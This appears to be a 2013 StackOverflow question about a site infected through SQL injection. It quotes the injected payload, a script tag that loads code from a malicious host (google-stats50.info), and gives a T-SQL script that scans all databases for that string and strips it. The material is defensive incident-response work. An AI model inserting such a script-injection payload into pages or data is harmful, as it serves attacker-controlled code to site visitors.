StackOverflow2013

Note that there are some explanatory texts on larger screens.

plurals

PODeciphering this XSS attack
text
Body
copied!<p>Did anybody know more information about this attack ?</p> <p>I recently got this script injected in my web sites</p> <p><strong><em>By the way dont go on this web site since it's the source of the infection</em></strong></p> <pre><code> </title><script src=http://google-stats50.**fo/***.php> </code></pre> <p>What kind of attack is it, SQL or CODE ?</p> <p><strong><em>By the way dont go on this web site since it's the source of the infection</em></strong></p> <p>The question is by what quind of attack this infectious attack occurs ?</p> <p>We found it, and was not like twitter attack, it's was by request parameters in a url and inject sql directly in the parameter.</p> <p>There is the SQL script produce by our sql team to clean your database who was infected</p> <pre><code>/************************************************************************* SQL INJECTED DATABASE *************************************************************************/ DECLARE @dbName VARCHAR(200), @SqlString NVARCHAR(MAX), @SearchText VARCHAR(MAX), @SearchTextLike VARCHAR(MAX), @NbItems INT, @TableName VARCHAR(255), @ColoneName VARCHAR(255), @objId BIGINT, @tmpSqlString NVARCHAR(MAX), @CleanUp BIT, @RowCount BIGINT, @debug BIT, @Msg VARCHAR(MAX); SET @debug = 0; -- 1 = Additionnal prints SET @CleanUp = 0; -- 1 = Update tables SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>'; SET @SearchTextLike = '%' + @SearchText + '%'; DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255)); DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255)); DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX)); DECLARE @DbToValidate TABLE (DbName VARCHAR(255)); INSERT INTO @DbToValidate SELECT Name FROM sys.databases WHERE [state] = 0 AND Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND Name NOT LIKE 'sys%' ORDER BY Name; DECLARE db_cusor CURSOR FOR SELECT DbName FROM @DbToValidate; OPEN db_cusor; FETCH NEXT FROM db_cusor INTO @dbName; WHILE @@FETCH_STATUS = 0 BEGIN SET @Msg = 'Traitement pour : ' + @dbName; INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); PRINT @Msg; IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0 BEGIN IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName; --Vider le contenu DELETE FROM @QueryResults; IF @debug = 1 PRINT '2 - Vider la table @QueryResults'; IF @CleanUp = 0 BEGIN SET @SqlString = ' USE [' + @dbName + '];' + ' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' + ' FROM sys.tables tbl inner join' + ' sys.columns col on tbl.object_id = col.object_id' + ' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''; END ELSE BEGIN SET @SqlString = ' USE [' + @dbName + '];' + ' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' + ' FROM sys.tables tbl inner join' + ' sys.columns col on tbl.object_id = col.object_id' + ' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''' END INSERT INTO @QueryResults EXEC sp_executesql @SqlString; --Validation pour les erreurs IF @@ERROR <> 0 BEGIN GOTO NEXTPRINC END IF @debug = 1 PRINT '3 - Récupérer les Query String'; --Faire une loop sur les querys string pour voir s'il y a des injections SQL DECLARE query_cursor CURSOR FOR SELECT SqlString, TableName, ColoneName FROM @QueryResults; OPEN query_cursor; FETCH NEXT FROM query_cursor INTO @SqlString, @TableName, @ColoneName; IF @debug = 1 PRINT '4 - Cursor sur les Query String'; WHILE @@FETCH_STATUS = 0 BEGIN SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');' EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output --Validation pour les erreurs IF @@ERROR <> 0 BEGIN GOTO NEXTINNER END IF ISNULL(@objId, -1) <> -1 BEGIN SET @SqlString = 'USE [' + @dbName + '];' + @SqlString; IF @CleanUp = 0 BEGIN EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output END ELSE BEGIN EXEC sp_executesql @SqlString SET @RowCount = @@ROWCOUNT END --Validation pour les erreurs IF @@ERROR <> 0 BEGIN GOTO NEXTINNER END IF @CleanUp = 0 BEGIN IF ISNULL(@NbItems, 0) <> 0 BEGIN -- BD Infectée ! INSERT INTO @InfectedDB VALUES (@dbName); PRINT '**** BD Infectée : ' + @dbName; SELECT * FROM @InfectedDB; BREAK; END END ELSE BEGIN IF @RowCount <> 0 BEGIN SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7)); INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); PRINT @Msg; END END END NEXTINNER: -- Get the next query. FETCH NEXT FROM query_cursor INTO @SqlString, @TableName, @ColoneName; END CLOSE query_cursor; DEALLOCATE query_cursor; IF @debug = 1 PRINT '5 - Vider cursor query'; END ELSE BEGIN SET @Msg = '**** La base de données n''est pas ''ONLINE''.'; INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); PRINT @Msg; END SET @Msg = 'Fin traitement pour : ' + @dbName; INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg); PRINT @Msg; NEXTPRINC: -- Get the next database. FETCH NEXT FROM db_cusor INTO @dbName; END IF @CleanUp = 0 BEGIN SELECT * FROM @InfectedDB; END ELSE BEGIN SELECT * FROM @CleanedUpDB; END GOTO FIN FININNER: CLOSE query_cursor; DEALLOCATE query_cursor; FIN: --Fermeture du cursor CLOSE db_cusor; DEALLOCATE db_cusor; </code></pre>

Querying!

Guidance

An individual column

Larger individual text columns get their own page to allow for proper reading.

SQuiL has stopped working due to an internal error.

If you are curious you may find further information in the browser console, which is accessible through the devtools (F12).

Reload